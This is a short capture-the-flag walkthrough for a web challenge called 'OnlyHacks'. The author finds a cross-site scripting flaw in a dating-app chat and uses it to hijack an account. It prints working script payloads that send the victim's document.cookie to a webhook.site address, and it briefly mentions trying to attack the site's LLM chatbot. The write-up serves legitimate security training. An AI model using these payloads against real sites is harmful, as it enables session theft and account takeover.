Coming Soon!
Tag: Walkthrough
-
OnlyHacks
Summary
This Valentine’s-themed web challenge focuses on exploiting Cross-Site Scripting (XSS) to steal a cookie, hijack an account, and retrieve the flag.
Write-up
The login page appears resistant to basic SQL injection and authentication bypass attempts.
We will move on with the Sign Up function.
The signup process, however, requires a profile picture upload, which presents a potential vulnerability.
Moving on the the Dashboard.
Upon reaching the dashboard, swiping through profiles reveals usernames, not nicknames, as indicated in
dashboard.js
. This suggests two possible attack vectors: XSS within the chat functionality or exploiting a web Large Language Model (LLM) integrated into the chatbot.I initially pursued the web LLM angle, influenced by my experience with tools like ChatGPT and Gemini. However, this proved to be a misdirection. The challenge actually involves a simpler XSS vulnerability.
Let try some basic XXS with:
<script>alert(1)</script>
We’ve confirmed the XSS vulnerability. Now, let’s craft a payload to steal cookies.
<script>fetch('https://webhook.site/b7e66...',{method: 'POST', mode: 'no-cors', body:document.cookie}); </script>
Or
<script>document.location="https://webhook.site/b7e66.../?cookie="+document.cookie</script>
Replace the cookie we got and refresh the page to get the flag.